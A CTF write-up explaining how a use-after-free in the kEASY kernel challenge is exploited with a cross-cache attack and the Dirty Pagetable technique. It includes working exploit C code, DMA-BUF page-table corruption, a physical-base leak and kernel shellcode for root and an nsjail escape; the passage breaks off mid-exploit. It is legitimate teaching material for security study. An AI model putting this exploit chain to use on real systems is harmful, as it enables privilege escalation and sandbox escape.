CTFするぞ

I write about things other than CTF, too

Understanding Dirty Pagetable - m0leCon Finals 2023 CTF Writeup

About

I participated in m0leCon Finals 2023 CTF, which was held at Politecnico di Torino, Italy, as a member of std::weak_ptr<moon>*1.

Among the pwnable challenges I solved during the CTF, a kernel pwn named kEASY was quite interesting, so I'm going to explain the exploitation technique I used to solve it.

Challenge setup

The challenge files are available at the following link.

bitbucket.org

Distributed files:

kernel.conf
rootfs.cpio.gz
bzImage
run.sh
keasy.c
keasy.h

Mitigations

KASLR, SMAP, SMEP, and KPTI are enabled.

#!/bin/sh
qemu-system-x86_64 \
    -kernel bzImage \
    -cpu qemu64,+smep,+smap,+rdrand \
    -m 4G \
    -smp 4 \
    -initrd rootfs.cpio.gz \
    -hda flag.txt \
    -append "console=ttyS0 quiet loglevel=3 oops=panic panic_on_warn=1 panic=-1 pti=on page_alloc.shuffle=1" \
    -monitor /dev/null \
    -nographic \
    -no-reboot

Mitigations such as slab freelist randomization and slab hardening are also enabled. Additionally, the shell we are given is sandboxed by nsjail, which prohibits many system calls and imposes resource limits such as a cap on the number of processes.

Source code

A kernel module that defines an ioctl handler is loaded on the system. The handler is the function below:

static long keasy_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) {
    long ret = -EINVAL;
    struct file *myfile;
    int fd;

    if (!enabled) {
        goto out;
    }
    enabled = 0;

    myfile = anon_inode_getfile("[easy]", &keasy_file_fops, NULL, 0);

    fd = get_unused_fd_flags(O_CLOEXEC);
    if (fd < 0) {
        ret = fd;
        goto err;
    }

    fd_install(fd, myfile);

    if (copy_to_user((unsigned int __user *)arg, &fd, sizeof(fd))) {
        ret = -EINVAL;
        goto err;
    }

    ret = 0;
    return ret;

err:
    fput(myfile);
out:
    return ret;
}

It creates an anonymous file named [easy] and assigns a file descriptor to it. Once the file descriptor is assigned, its number is copied to a user-land buffer.

This feature can be called only once*2 after boot.

Vulnerability

If copy_to_user fails after fd_install has assigned the file descriptor, execution jumps to err and fput is called. fput decrements the reference count of a file. Because the anonymous file is not shared, the counter drops to zero in this case, and the structure allocated for the file is freed.

This means a Use-after-Free occurs if copy_to_user fails: the file itself is freed while its file descriptor is still alive in user-land.
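The reference counting behind this bug can be modeled in user space. The following is only a toy sketch: toy_file, toy_fdtable, and the toy_* functions are hypothetical stand-ins, not kernel APIs, and "freeing" is modeled with a flag so that the example stays well-defined. It assumes, as in the kernel, that installing a descriptor does not take an extra reference.

```c
#include <stdbool.h>
#include <stddef.h>

/* Toy stand-in for struct file: only a reference count and a "freed" flag. */
struct toy_file {
    long count;
    bool freed;
};

/* Toy stand-in for the per-process descriptor table. */
struct toy_fdtable {
    struct toy_file *slots[8];
};

/* Like fput(): drop one reference and "free" the object when it hits zero. */
static void toy_fput(struct toy_file *f) {
    if (--f->count == 0)
        f->freed = true; /* the real kernel returns the object to its slab */
}

/* Like fd_install(): publish the pointer WITHOUT taking a new reference. */
static void toy_fd_install(struct toy_fdtable *t, int fd, struct toy_file *f) {
    t->slots[fd] = f;
}

/* Replays the error path of keasy_ioctl; returns true if slot 3 dangles. */
static bool toy_keasy_error_path(void) {
    static struct toy_file file;
    struct toy_fdtable table = {0};

    file.count = 1;                   /* anon_inode_getfile() */
    file.freed = false;
    toy_fd_install(&table, 3, &file); /* descriptor is now visible to user-land */
    toy_fput(&file);                  /* copy_to_user failed, so we reach err: */

    /* The table still references an object that has already been released. */
    return table.slots[3] != NULL && table.slots[3]->freed;
}
```

Calling toy_keasy_error_path() returns true, which corresponds to the dangling descriptor described above.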

Confirming the bug

We can easily make copy_to_user fail by passing an invalid address, which triggers the Use-after-Free. Since the new file descriptor is always the smallest unused number, we can predict it even though ioctl fails.

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/ioctl.h>
#include <unistd.h>

void fatal(const char *msg) {
  perror(msg);
  exit(1);
}

int main() {
  // Open vulnerable device
  int fd = open("/dev/keasy", O_RDWR);
  if (fd == -1)
    fatal("/dev/keasy");

  // Get dangling file descriptor
  int ezfd = fd + 1;
  if (ioctl(fd, 0, 0xdeadbeef) == 0)
    fatal("ioctl did not fail");

  // Use-after-free
  char buf[4];
  read(ezfd, buf, 4);
  return 0;
}

We can confirm that the kernel crashes when we execute the code above.

UAF confirmed
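The PoC guesses the dangling descriptor as fd + 1 because POSIX hands out the lowest unused descriptor number. A minimal sketch of that rule follows; peek_next_fd is a hypothetical helper name, and the prediction only holds while no other thread opens or closes descriptors in between.

```c
#include <fcntl.h>
#include <unistd.h>

/* Returns the descriptor number the next open()/dup() should receive,
 * or -1 on error. It opens /dev/null to learn the lowest free slot and
 * closes it again, which makes that slot available once more. */
static int peek_next_fd(void) {
    int fd = open("/dev/null", O_RDONLY);
    if (fd < 0)
        return -1;
    close(fd);
    return fd;
}
```

If peek_next_fd() returns n, an open() issued right afterwards by the same single-threaded process also returns n.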

What makes the exploit hard is that the UAF occurs in a dedicated slab cache [1] instead of a generic slab cache. A file structure is allocated from a dedicated slab cache named files_cache:

# cat /proc/slabinfo | grep files_cache
files_cache          920    920    704   23    4 : tunables    0    0    0 : slabdata     40     40      0

Therefore, unlike objects allocated with kmalloc, objects other than files will not usually overlap with the freed object after the Use-after-Free, which makes exploitation difficult.
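The slabinfo line above also tells us the slab geometry: the columns after the name are active_objs, num_objs, objsize, objperslab, and pagesperslab. The sketch below parses those columns; the struct and function names are made up for illustration, and 4 KiB pages are assumed.

```c
#include <stdio.h>

struct slab_geometry {
    char name[64];
    unsigned long active_objs, num_objs, objsize, objperslab, pagesperslab;
};

/* Parses the leading columns of one /proc/slabinfo line.
 * Returns 0 on success, -1 if the line does not have the expected shape. */
static int parse_slabinfo_line(const char *line, struct slab_geometry *g) {
    int n = sscanf(line, "%63s %lu %lu %lu %lu %lu",
                   g->name, &g->active_objs, &g->num_objs,
                   &g->objsize, &g->objperslab, &g->pagesperslab);
    return n == 6 ? 0 : -1;
}

/* Bytes spanned by one slab, assuming 4 KiB pages. */
static unsigned long slab_bytes(const struct slab_geometry *g) {
    return g->pagesperslab * 4096UL;
}
```

For the line shown above this gives 23 objects of 704 bytes in a 4-page (16384-byte) slab, so every one of the 23 objects has to be free before the slab's pages can go back to the page allocator.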

Cross-Cache Attack

Still, we can use an exploitation technique called a cross-cache attack to exploit a heap vulnerability that occurs in a dedicated cache. There are several attacks built on cross-cache, such as Dirty Cred [2] and Dirty Pagetable.

The principle of the cross-cache attack is simple. Here I will explain it for the Use-after-Free case.

First of all, we spray objects allocated in the dedicated cache as described in ① and ② in the figure below.

Secondly, we free the UAF object as in ③ *3.

Finally, if we free every sprayed object, the slab page itself is also freed, since no object in this slab is in use any longer.

The buddy system in Linux manages pages, and a freed page can be reused for a different purpose later on. Therefore, we can overlap the UAF file object with a structure completely different from a file.

In the Dirty Cred attack, we overwrite the cred structure, which manages the privileges of a process. However, we need a different attack this time since the target is a file structure.

Dirty Pagetable

I used a technique named Dirty Pagetable to solve this challenge.

How it works

Just as Dirty Cred sets the cred structure as the attack target, Dirty Pagetable sets the page table as the attack target.

In x86-64 Linux, a 4-level page table is usually used to translate virtual addresses to physical addresses. Dirty Pagetable targets the PTE (Page Table Entry), which is the last level just before physical memory. In Linux, when a new PTE is required, the page for the PTE is also allocated from the buddy system.

Therefore, we can allocate a PTE on the same page where the dangling file pointer is located. The following figure describes the situation*4.
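To see which slot of a last-level table a given user address uses, we can split the virtual address into its four 9-bit indices. This is a sketch assuming standard x86-64 4-level paging with 4 KiB pages; pt_index and split_vaddr are illustrative names, and 0xdead7000 in the note below is just a sample address.

```c
#include <stdint.h>

struct pt_index {
    unsigned pgd, pud, pmd, pte; /* index at each of the 4 levels */
    uint64_t pte_byte_offset;    /* byte offset of the entry in its table page */
};

/* Splits a virtual address into its page table indices (9 bits per level). */
static struct pt_index split_vaddr(uint64_t va) {
    struct pt_index ix;
    ix.pgd = (unsigned)((va >> 39) & 0x1ff);
    ix.pud = (unsigned)((va >> 30) & 0x1ff);
    ix.pmd = (unsigned)((va >> 21) & 0x1ff);
    ix.pte = (unsigned)((va >> 12) & 0x1ff);
    ix.pte_byte_offset = (uint64_t)ix.pte * 8; /* each entry is 8 bytes */
    return ix;
}
```

For example, split_vaddr(0xdead7000) yields indices 0, 3, 0xf5, and 0xd7, so the entry for that address sits at byte offset 0x6b8 inside its last-level table page. A freed object that lands on the same physical page can overlap that entry only if one of its fields falls on the same offset.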

The following code overlaps a UAF object with a PTE. Remember to pin the process to a single CPU so that the slab cache of the same CPU is always used, since this environment runs on multiple cores.

void bind_core(int core) {
  cpu_set_t cpu_set;
  CPU_ZERO(&cpu_set);
  CPU_SET(core, &cpu_set);
  sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
}

...

int main() {
  int file_spray[N_FILESPRAY];
  void *page_spray[N_PAGESPRAY];

  // Pin CPU (important!)
  bind_core(0);

  // Open vulnerable device
  int fd = open("/dev/keasy", O_RDWR);
  if (fd == -1)
    fatal("/dev/keasy");

  // Prepare pages (PTE not allocated at this moment)
  for (int i = 0; i < N_PAGESPRAY; i++) {
    page_spray[i] = mmap((void*)(0xdead0000UL + i*0x10000UL),
                         0x8000, PROT_READ|PROT_WRITE,
                         MAP_ANONYMOUS|MAP_SHARED, -1, 0);
    if (page_spray[i] == MAP_FAILED) fatal("mmap");
  }

  puts("[+] Spraying files...");
  // Spray file (1)
  for (int i = 0; i < N_FILESPRAY/2; i++)
    if ((file_spray[i] = open("/", O_RDONLY)) < 0) fatal("/");

  // Get dangling file descriptor
  int ezfd = file_spray[N_FILESPRAY/2-1] + 1;
  if (ioctl(fd, 0, 0xdeadbeef) == 0) // Use-after-Free
    fatal("ioctl did not fail");

  // Spray file (2)
  for (int i = N_FILESPRAY/2; i < N_FILESPRAY; i++)
    if ((file_spray[i] = open("/", O_RDONLY)) < 0) fatal("/");

  puts("[+] Releasing files...");
  // Release the page for file slab cache
  for (int i = 0; i < N_FILESPRAY; i++)
    close(file_spray[i]);

  puts("[+] Allocating PTEs...");
  // Allocate many PTEs (page fault)
  for (int i = 0; i < N_PAGESPRAY; i++)
    for (int j = 0; j < 8; j++)
      *(char*)(page_spray[i] + j*0x1000) = 'A' + j;

  getchar();
  return 0;
}

The file structure right before it gets freed by fput:

After the PTE spray finishes, we find PTE-like data allocated at the same address:

One of the entries points to the following physical memory, where we can find the data we wrote. This means the PTE was allocated for one of the sprayed pages.

Ideally, we want to overwrite this PTE and make a user-land virtual address point to a kernel-land physical address. How we can overwrite the PTE depends on the vulnerable object. Let's consider the case of a file structure.

Exploitation for a file structure

It is a bit hard to exploit a file structure because it has few fields we can control. The original article [3] explains a method that uses dup, and we will use it too.

A file structure has a field named f_count at offset 0x38 from the beginning.

struct file {
    union {
        struct llist_node  f_llist;
        struct rcu_head    f_rcuhead;
        unsigned int      f_iocb_flags;
    };

    /*
    * Protects f_ep, f_flags.
    * Must not be taken from IRQ context.
    */
    spinlock_t      f_lock;
    fmode_t         f_mode;
    atomic_long_t       f_count;
    struct mutex       f_pos_lock;
...

f_count holds the reference count of the file object and is incremented when we call the dup system call to duplicate the file descriptor. Therefore, we obtain a primitive that increments an entry in the PTE.

So, can we simply call dup many times to make an entry in the PTE point to a kernel-land physical address?

It is not so simple, unfortunately.

Most physical addresses are randomized when KASLR is enabled. In addition, the physical memory allocated for user-land sits at much lower addresses than the physical memory for kernel-land, and the gap between them is large.

A process can have up to 65535 file descriptors in this environment, which limits the number of increments we can perform. One workaround is to use fork and spread the descriptors across processes, but that is not possible this time because nsjail allows us to run only 2 processes.

Therefore, we need to find another way to make a user-land virtual address point to a kernel-land physical address.
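The descriptor limit translates into a very small reach. Each dup adds 1 to the raw 64-bit entry, so moving the physical address by one 4 KiB page costs 0x1000 calls. The helpers below are a back-of-the-envelope sketch; the names are made up for illustration, and they assume the target lies at a higher address than the starting point.

```c
#include <stdint.h>

#define PAGE_BYTES 0x1000ULL /* 4 KiB pages assumed */

/* dup() calls needed to move an entry from from_phys up to to_phys. */
static uint64_t dups_needed(uint64_t from_phys, uint64_t to_phys) {
    return to_phys - from_phys;
}

/* Whole pages that can be skipped with a budget of `budget` increments. */
static uint64_t pages_reachable(uint64_t budget) {
    return budget / PAGE_BYTES;
}
```

With 65535 descriptors, pages_reachable(65535) is 15, so only frames within 15 pages above the original one are reachable. A gap of even 16 MiB would need 0x1000000 increments, far beyond the limit.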

UAF in physical memory

So far, the UAF file object is located at the same physical address as the PTE, as described in the figure below:

Here, if we call dup 0x1000 times, the entry overlapping f_count in the PTE will point to the next physical page, so that two PTE entries point to the same physical address.
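Why 0x1000 increments move the mapping by exactly one page becomes clear from the entry layout: on x86-64 the physical frame address occupies bits 12 to 51, and the remaining bits are flags. The following sketch models the effect of the dup calls on a raw entry value; the function names and the sample entry in the note are hypothetical.

```c
#include <stdint.h>

#define PTE_ADDR_MASK 0x000ffffffffff000ULL /* bits 12..51: physical frame */

/* Physical address of the page an entry maps. */
static uint64_t pte_phys(uint64_t pte) {
    return pte & PTE_ADDR_MASK;
}

/* Everything that is not the frame address (permission and status bits). */
static uint64_t pte_flags(uint64_t pte) {
    return pte & ~PTE_ADDR_MASK;
}

/* Models n dup() calls incrementing an f_count that overlaps this entry. */
static uint64_t pte_after_dups(uint64_t pte, uint64_t n) {
    return pte + n;
}
```

For a sample entry 0x8000000012345067, adding 0x1000 changes the mapped frame from 0x12345000 to 0x12346000 while the flag bits stay untouched.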

After this modification, we can find the overlapping page by reading each page and checking whether the data we wrote has changed.

  /**
   * 4. Modify PTE entry to overlap 2 physical pages
   */
  // Increment physical address
  for (int i = 0; i < 0x1000; i++)
    if (dup(ezfd) < 0)
      fatal("dup");

  puts("[+] Searching for overlapping page...");
  // Search for page that overlaps with other physical page
  void *evil = NULL;
  for (int i = 0; i < N_PAGESPRAY; i++) {
    // We wrote 'H'(='A'+7) but if it changes the PTE overlaps with the file
    if (*(char*)(page_spray[i] + 7*0x1000) != 'A' + 7) { // +38h: f_count
      evil = page_spray[i] + 0x7000;
      printf("[+] Found overlapping page: %p\n", evil);
      break;
    }
  }
  if (evil == NULL) fatal("target not found :(");

We can detect the overlapping pages as shown below:

Checking the physical address of the detected page, we find that 2 user-land virtual addresses point to the same physical address.

Note that the overlap itself is not important here. What matters is that we have identified the user-land virtual address corresponding to the PTE entry we can corrupt.

Arbitrary Physical Address Read/Write

As mentioned earlier, we cannot reach kernel-land physical memory simply by calling dup many times because of the distance between user-land and kernel-land physical memory. To resolve this problem, I used DMA-BUF Heap this time. (The original article also mentions io_uring, but it is not available here because of nsjail.)

DMA-BUF [4] is a framework for sharing memory buffers quickly and safely between multiple devices. We can open the device at /dev/dma_heap/system to control the DMA-BUF Heap. By issuing the DMA_HEAP_IOCTL_ALLOC ioctl on this device, we can allocate memory that can be mapped into user-land.
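The final exploit hard-codes DMA_HEAP_IOCTL_ALLOC as 0xc0184800 instead of including the kernel header. The value can be derived by hand from the generic Linux ioctl encoding, as the sketch below shows. It assumes the x86-64 encoding (2 direction bits, 14 size bits, 8 type bits, 8 number bits) and the UAPI definition _IOWR('H', 0x0, struct dma_heap_allocation_data); ioc_encode and dma_heap_ioctl_alloc are illustrative names.

```c
#include <stdint.h>

/* Mirrors the layout of the UAPI struct dma_heap_allocation_data (24 bytes). */
struct dma_heap_allocation_data {
    uint64_t len;
    uint32_t fd;
    uint32_t fd_flags;
    uint64_t heap_flags;
};

/* Generic ioctl number: dir in bits 30..31, size in 16..29,
 * type in 8..15, nr in 0..7. */
static uint32_t ioc_encode(uint32_t dir, uint32_t type, uint32_t nr,
                           uint32_t size) {
    return (dir << 30) | (size << 16) | (type << 8) | nr;
}

/* _IOWR means the direction is read|write, which is encoded as 3. */
static uint32_t dma_heap_ioctl_alloc(void) {
    return ioc_encode(3, 'H', 0,
                      (uint32_t)sizeof(struct dma_heap_allocation_data));
}
```

With a 24-byte (0x18) argument struct and type 'H' (0x48), dma_heap_ioctl_alloc() evaluates to 0xc0184800.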

The page mapped through this ioctl is different from a page mapped by a plain mmap. It is allocated in physical memory close to the PTEs *5.

So, if we place a DMA-BUF Heap page in the PTE entry that we can corrupt via f_count, we can realize the following situation. (We have to allocate the DMA-BUF Heap page in the middle of the PTE spray so that another PTE is allocated right next to the DMA page.)

Since we already know which user-land page corresponds to the corruptible PTE entry, we munmap it and mmap the DMA-BUF Heap page there, so that f_count overlaps the PTE entry for the DMA-BUF Heap page.

What is important is that a PTE exists right next to the page allocated with DMA-BUF Heap. Therefore, if we call dup 0x1000 times again to increment f_count, the DMA-BUF Heap mapping in user-land will point to a PTE.

Since we can read and write the DMA-BUF page mapped to user-land, we obtain a primitive to fully control a PTE. We can then modify its entries and make one of them point to an arbitrary physical address, including kernel-land.

This is how we can achieve arbitrary physical address read/write.
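Once a whole PTE page is writable from user-land, pointing an entry at a chosen physical page is a matter of composing the right 64-bit value. The exploit uses values of the form (phys & ~0xfff) | 0x8000000000000067. The sketch below spells out which x86-64 bits that constant sets; the macro and function names are chosen for illustration.

```c
#include <stdint.h>

#define PTE_PRESENT  (1ULL << 0)  /* page is mapped */
#define PTE_RW       (1ULL << 1)  /* writable */
#define PTE_USER     (1ULL << 2)  /* accessible from user mode */
#define PTE_ACCESSED (1ULL << 5)
#define PTE_DIRTY    (1ULL << 6)
#define PTE_NX       (1ULL << 63) /* no-execute */

/* Builds a user-accessible, writable, non-executable entry for the
 * 4 KiB page that contains `phys`. */
static uint64_t make_user_rw_pte(uint64_t phys) {
    return (phys & ~0xfffULL) | PTE_NX | PTE_DIRTY | PTE_ACCESSED |
           PTE_USER | PTE_RW | PTE_PRESENT;
}
```

For instance, make_user_rw_pte(0x9c000) gives 0x800000000009c067. Since the entry is written directly to memory, the CPU may keep serving an older translation from the TLB until that entry is evicted.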

If we run the following code, the page allocated with DMA-BUF will be adjacent to a PTE.

  /**
   * 3. Overlap UAF file with PTE
   */
  puts("[+] Allocating PTEs...");
  // Allocate many PTEs (1)
  for (int i = 0; i < N_PAGESPRAY/2; i++)
    for (int j = 0; j < 8; j++)
      *(char*)(page_spray[i] + j*0x1000) = 'A' + j;

  // Allocate DMA-BUF heap
  int dma_buf_fd = -1;
  struct dma_heap_allocation_data data;
  data.len = 0x1000;
  data.fd_flags = O_RDWR;
  data.heap_flags = 0;
  data.fd = 0;
  if (ioctl(dmafd, DMA_HEAP_IOCTL_ALLOC, &data) < 0)
    fatal("DMA_HEAP_IOCTL_ALLOC");
  printf("[+] dma_buf_fd: %d\n", dma_buf_fd = data.fd);

  // Allocate many PTEs (2)
  for (int i = N_PAGESPRAY/2; i < N_PAGESPRAY; i++)
    for (int j = 0; j < 8; j++)
      *(char*)(page_spray[i] + j*0x1000) = 'A' + j;

  /**
   * 4. Modify PTE entry to overlap 2 physical pages
   */
  // Increment physical address
  for (int i = 0; i < 0x1000; i++)
    if (dup(ezfd) < 0)
      fatal("dup");

  puts("[+] Searching for overlapping page...");
  // Search for page that overlaps with other physical page
  void *evil = NULL;
  for (int i = 0; i < N_PAGESPRAY; i++) {
    // We wrote 'H'(='A'+7) but if it changes the PTE overlaps with the file
    if (*(char*)(page_spray[i] + 7*0x1000) != 'A' + 7) { // +38h: f_count
      evil = page_spray[i] + 0x7000;
      printf("[+] Found overlapping page: %p\n", evil);
      break;
    }
  }
  if (evil == NULL) fatal("target not found :(");

  // Place PTE entry for DMA buffer onto controllable PTE
  puts("[+] Remapping...");
  munmap(evil, 0x1000);
  void *dmabuf = mmap(evil, 0x1000, PROT_READ | PROT_WRITE,
                      MAP_SHARED | MAP_POPULATE, dma_buf_fd, 0);
  *(char*)dmabuf = '0';

Checking in gdb, we find that a PTE is allocated at the address where the dangling file object was, and the physical address of the DMA-BUF page sits at the offset corresponding to f_count. Additionally, the page next to the DMA-BUF page looks like another PTE.

Therefore, we can call dup 0x1000 times to corrupt a PTE.

  /**
   * Get physical AAR/AAW
   */
  // Corrupt physical address of DMA-BUF
  for (int i = 0; i < 0x1000; i++)
    if (dup(ezfd) < 0)
      fatal("dup");
  printf("[+] DMA-BUF now points to PTE: 0x%016lx\n", *(size_t*)dmabuf);

Leaking physical base address

Reading and writing through physical addresses never fails, regardless of page permissions. So, we can search for specific machine code or magic numbers to locate the physical address of the kernel.

Although it's already 2024, some physical addresses are still fixed on both Linux and Windows.

The pages around here are always at a fixed address, and page table data is left in them. (Credit to shift_crops, who found this during HITCON.) This page table holds a pointer to a kernel-land physical address, which is useful for leaking the physical base address of the kernel.

  // Leak kernel physical base
  void *wwwbuf = NULL;
  *(size_t*)dmabuf = 0x800000000009c067;
  for (int i = 0; i < N_PAGESPRAY; i++) {
    if (page_spray[i] == evil) continue;
    if (*(size_t*)page_spray[i] > 0xffff) {
      wwwbuf = page_spray[i];
      printf("[+] Found victim page table: %p\n", wwwbuf);
      break;
    }
  }
  if (wwwbuf == NULL) fatal("victim page table not found");
  size_t phys_base = ((*(size_t*)wwwbuf) & ~0xfff) - 0x1c04000;
  printf("[+] Physical kernel base address: 0x%016lx\n", phys_base);
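The base calculation in the last lines is plain arithmetic: drop the low 12 flag bits of the leaked entry and subtract a fixed distance. A standalone sketch follows. The offset 0x1c04000 is taken from the exploit and is specific to this kernel build, while the function name and the sample value in the note are hypothetical.

```c
#include <stdint.h>

/* Distance between the leaked pointer and the kernel's physical base.
 * Taken from the exploit; valid only for this particular kernel image. */
#define LEAK_TO_BASE_OFFSET 0x1c04000ULL

/* Clears the low 12 bits (flags) of a leaked page table entry and
 * rebases the result to the start of the kernel image. */
static uint64_t kernel_phys_base_from_leak(uint64_t leaked_entry) {
    return (leaked_entry & ~0xfffULL) - LEAK_TO_BASE_OFFSET;
}
```

As a made-up example, a leaked entry of 0x3c04067 would give a physical base of 0x2000000.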

Escaping from nsjail

This time we need to escape from nsjail in addition to escalating privileges. Since that is complicated, let's execute shellcode in kernel space.

We can simply overwrite the machine code of some function in the Linux kernel with our shellcode because we have an AAW primitive on physical memory. I modified do_symlinkat, which can be reached from inside nsjail by calling the symlink function in C.

Refer to [5] for what the shellcode does.

  init_cred         equ 0x1445ed8
  commit_creds      equ 0x00ae620
  find_task_by_vpid equ 0x00a3750
  init_nsproxy      equ 0x1445ce0
  switch_task_namespaces equ 0x00ac140
  init_fs                equ 0x1538248
  copy_fs_struct         equ 0x027f890
  kpti_bypass            equ 0x0c00f41

_start:
  endbr64
  call a
a:
  pop r15
  sub r15, 0x24d4c9

  ; commit_creds(init_cred) [3]
  lea rdi, [r15 + init_cred]
  lea rax, [r15 + commit_creds]
  call rax

  ; task = find_task_by_vpid(1) [4]
  mov edi, 1
  lea rax, [r15 + find_task_by_vpid]
  call rax

  ; switch_task_namespaces(task, init_nsproxy) [5]
  mov rdi, rax
  lea rsi, [r15 + init_nsproxy]
  lea rax, [r15 + switch_task_namespaces]
  call rax

  ; new_fs = copy_fs_struct(init_fs) [6]
  lea rdi, [r15 + init_fs]
  lea rax, [r15 + copy_fs_struct]
  call rax
  mov rbx, rax

  ; current = find_task_by_vpid(getpid())
  mov rdi, 0x1111111111111111   ; will be fixed at runtime
  lea rax, [r15 + find_task_by_vpid]
  call rax

  ; current->fs = new_fs [8]
  mov [rax + 0x740], rbx

  ; kpti trampoline [9]
  xor eax, eax
  mov [rsp+0x00], rax
  mov [rsp+0x08], rax
  mov rax, 0x2222222222222222   ; win
  mov [rsp+0x10], rax
  mov rax, 0x3333333333333333   ; cs
  mov [rsp+0x18], rax
  mov rax, 0x4444444444444444   ; rflags
  mov [rsp+0x20], rax
  mov rax, 0x5555555555555555   ; stack
  mov [rsp+0x28], rax
  mov rax, 0x6666666666666666   ; ss
  mov [rsp+0x30], rax
  lea rax, [r15 + kpti_bypass]
  jmp rax

  int3
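The 8-byte constants such as 0x1111111111111111 in the shellcode are placeholders that get replaced with runtime values (the PID, the address of the return function, and the saved user-mode registers) before the shellcode is copied into the kernel. The final exploit does this with memmem. The sketch below is a portable equivalent that uses a manual search, and patch_u64 is a hypothetical helper name.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Replaces the first 8-byte occurrence of `marker` in buf with `value`.
 * Returns 0 on success, or -1 if the marker is not present. */
static int patch_u64(unsigned char *buf, size_t len,
                     uint64_t marker, uint64_t value) {
    for (size_t i = 0; i + sizeof(marker) <= len; i++) {
        if (memcmp(buf + i, &marker, sizeof(marker)) == 0) {
            memcpy(buf + i, &value, sizeof(value)); /* host byte order */
            return 0;
        }
    }
    return -1;
}
```

Checking the return value is worthwhile: if a placeholder is missing because the shellcode was reassembled differently, the patch would otherwise be skipped silently and the kernel would jump to a garbage address.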

The final exploit is shown below.

#define _GNU_SOURCE
#include <fcntl.h>
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <unistd.h>

#define N_PAGESPRAY 0x200
#define N_FILESPRAY 0x100

#define DMA_HEAP_IOCTL_ALLOC 0xc0184800
typedef unsigned long long u64;
typedef unsigned int u32;
struct dma_heap_allocation_data {
  u64 len;
  u32 fd;
  u32 fd_flags;
  u64 heap_flags;
};

void fatal(const char *msg) {
  perror(msg);
  exit(1);
}

void bind_core(int core) {
  cpu_set_t cpu_set;
  CPU_ZERO(&cpu_set);
  CPU_SET(core, &cpu_set);
  sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
}

unsigned long user_cs, user_ss, user_rsp, user_rflags;

static void save_state() {
  asm(
      "movq %%cs, %0\n"
      "movq %%ss, %1\n"
      "movq %%rsp, %2\n"
      "pushfq\n"
      "popq %3\n"
      : "=r"(user_cs), "=r"(user_ss), "=r"(user_rsp), "=r"(user_rflags)
      :
      : "memory");
}

int fd, dmafd, ezfd = -1;

static void win() {
  char buf[0x100];
  int fd = open("/dev/sda", O_RDONLY);
  if (fd < 0) {
    puts("[-] Lose...");
  } else {
    puts("[+] Win!");
    read(fd, buf, 0x100);
    write(1, buf, 0x100);
    puts("[+] Done");
  }
  exit(0);
}

int main() {
  int file_spray[N_FILESPRAY];
  void *page_spray[N_PAGESPRAY];

  /**
   * 1. Setup
   */
  // Pin CPU (important!)
  bind_core(0);
  save_state();

  // Open vulnerable device
  int fd = open("/dev/keasy", O_RDWR);
  if (fd == -1)
    fatal("/dev/keasy");
  // Open DMA-BUF
  int dmafd = open("/dev/dma_heap/system", O_RDWR);
  if (dmafd == -1)
    fatal("/dev/dma_heap/system");

  // Prepare pages (PTE not allocated at this moment)
  for (int i = 0; i < N_PAGESPRAY; i++) {
    page_spray[i] = mmap((void*)(0xdead0000UL + i*0x10000UL),
                         0x8000, PROT_READ|PROT_WRITE,
                         MAP_ANONYMOUS|MAP_SHARED, -1, 0);
    if (page_spray[i] == MAP_FAILED) fatal("mmap");
  }

  /**
   * 2. Release the page where dangling file points
   */
  puts("[+] Spraying files...");
  // Spray file (1)
  for (int i = 0; i < N_FILESPRAY/2; i++)
    if ((file_spray[i] = open("/", O_RDONLY)) < 0) fatal("/");

  // Get dangling file descriptor
  int ezfd = file_spray[N_FILESPRAY/2-1] + 1;
  if (ioctl(fd, 0, 0xdeadbeef) == 0) // Use-after-Free
    fatal("ioctl did not fail");

  // Spray file (2)
  for (int i = N_FILESPRAY/2; i < N_FILESPRAY; i++)
    if ((file_spray[i] = open("/", O_RDONLY)) < 0) fatal("/");

  puts("[+] Releasing files...");
  // Release the page for file slab cache
  for (int i = 0; i < N_FILESPRAY; i++)
    close(file_spray[i]);

  /**
   * 3. Overlap UAF file with PTE
   */
  puts("[+] Allocating PTEs...");
  // Allocate many PTEs (1)
  for (int i = 0; i < N_PAGESPRAY/2; i++)
    for (int j = 0; j < 8; j++)
      *(char*)(page_spray[i] + j*0x1000) = 'A' + j;

  // Allocate DMA-BUF heap
  int dma_buf_fd = -1;
  struct dma_heap_allocation_data data;
  data.len = 0x1000;
  data.fd_flags = O_RDWR;
  data.heap_flags = 0;
  data.fd = 0;
  if (ioctl(dmafd, DMA_HEAP_IOCTL_ALLOC, &data) < 0)
    fatal("DMA_HEAP_IOCTL_ALLOC");
  printf("[+] dma_buf_fd: %d\n", dma_buf_fd = data.fd);

  // Allocate many PTEs (2)
  for (int i = N_PAGESPRAY/2; i < N_PAGESPRAY; i++)
    for (int j = 0; j < 8; j++)
      *(char*)(page_spray[i] + j*0x1000) = 'A' + j;

  /**
   * 4. Modify PTE entry to overlap 2 physical pages
   */
  // Increment physical address
  for (int i = 0; i < 0x1000; i++)
    if (dup(ezfd) < 0)
      fatal("dup");

  puts("[+] Searching for overlapping page...");
  // Search for page that overlaps with other physical page
  void *evil = NULL;
  for (int i = 0; i < N_PAGESPRAY; i++) {
    // We wrote 'H'(='A'+7) but if it changes the PTE overlaps with the file
    if (*(char*)(page_spray[i] + 7*0x1000) != 'A' + 7) { // +38h: f_count
      evil = page_spray[i] + 0x7000;
      printf("[+] Found overlapping page: %p\n", evil);
      break;
    }
  }
  if (evil == NULL) fatal("target not found :(");

  // Place PTE entry for DMA buffer onto controllable PTE
  puts("[+] Remapping...");
  munmap(evil, 0x1000);
  void *dmabuf = mmap(evil, 0x1000, PROT_READ | PROT_WRITE,
                   MAP_SHARED | MAP_POPULATE, dma_buf_fd, 0);
  *(char*)dmabuf = '0';

  /**
   * Get physical AAR/AAW
   */
  // Corrupt physical address of DMA-BUF
  for (int i = 0; i < 0x1000; i++)
    if (dup(ezfd) < 0)
      fatal("dup");
  printf("[+] DMA-BUF now points to PTE: 0x%016lx\n", *(size_t*)dmabuf);

  // Leak kernel physical base
  void *wwwbuf = NULL;
  *(size_t*)dmabuf = 0x800000000009c067;
  for (int i = 0; i < N_PAGESPRAY; i++) {
    if (page_spray[i] == evil) continue;
    if (*(size_t*)page_spray[i] > 0xffff) {
      wwwbuf = page_spray[i];
      printf("[+] Found victim page table: %p\n", wwwbuf);
